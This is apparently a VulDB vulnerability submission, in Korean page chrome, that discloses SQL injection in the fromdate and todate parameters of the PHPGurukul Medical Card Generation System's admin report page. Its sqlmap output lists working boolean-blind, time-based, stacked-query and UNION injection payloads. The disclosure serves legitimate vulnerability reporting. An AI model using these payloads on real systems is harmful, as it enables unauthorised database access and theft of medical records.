제출 #427400: PHPGurukul Medical Card Generation System V1.0 SQL Injection정보

제목PHPGurukul Medical Card Generation System V1.0 SQL Injection
설명I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/card-bwdates-reports-details.php Vulnerable Parameter: 'fromd', 'todate' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to "Report of medical card" 3) Fill the dates 2) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request. 3) Input the payload to invoke the SQL injection. ----------------fromdate------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: fromdate (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: fromdate=2024-10-14' AND 1713=(SELECT (CASE WHEN (1713=1713) THEN 1713 ELSE (SELECT 3406 UNION SELECT 2540) END))-- jbAe&todate=asd&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2024-10-14' AND (SELECT 3141 FROM (SELECT(SLEEP(5)))JDEY)-- aufQ&todate=asd&submit= --- --------------todate---------------- --- Parameter: todate (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: fromdate=2024-10-14&todate=asd' AND 7095=(SELECT (CASE WHEN (7095=7095) THEN 7095 ELSE (SELECT 7312 UNION SELECT 5291) END))-- -&submit= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: fromdate=2024-10-14&todate=asd';SELECT SLEEP(5)#&submit= Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: fromdate=2024-10-14&todate=asd' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717871,0x6d67664c4c6952574a43745369714d457476507270416a6f74517667434c5948626774704e736575,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&submit= --- Please let me know if you need further information or a more detailed analysis.
사용자
 Delvy (UID 74555)
제출2024. 10. 21. AM 04:22 (2 연령 ago)
모더레이션2024. 10. 23. PM 01:05 (2 days later)
상태수락
VulDB 항목281563 [PHPGurukul Medical Card Generation System 1.0 Report of Medical Card Page card-bwdates-reports-details.php fromdate/todate SQL 주입]
포인트들17

이전개요다음

Want to know what is going to be exploited?

We predict KEV entries!